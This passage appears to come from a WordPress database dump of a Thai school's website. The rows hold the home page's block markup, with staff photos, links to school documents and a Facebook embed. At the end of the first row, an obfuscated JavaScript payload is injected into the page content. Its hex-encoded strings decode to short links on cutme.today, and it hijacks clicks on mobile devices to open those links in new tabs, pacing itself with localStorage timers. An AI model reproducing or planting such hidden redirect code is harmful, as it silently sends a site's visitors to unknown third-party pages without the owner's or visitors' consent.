0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:41:44','2024-09-24 03:41:44','',19,'http://watprato.ssk.in.th/?p=409',0,'revision','',0),
(411,2,'2024-09-24 10:44:22','2024-09-24 03:44:22','','458199408_122175360092202781_7097423784924703217_n','','inherit','open','closed','','458199408_122175360092202781_7097423784924703217_n-2','','','2024-09-24 10:44:22','2024-09-24 03:44:22','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1.jpg',0,'attachment','image/jpeg',0),
(412,2,'2024-09-24 10:45:32','2024-09-24 03:45:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video 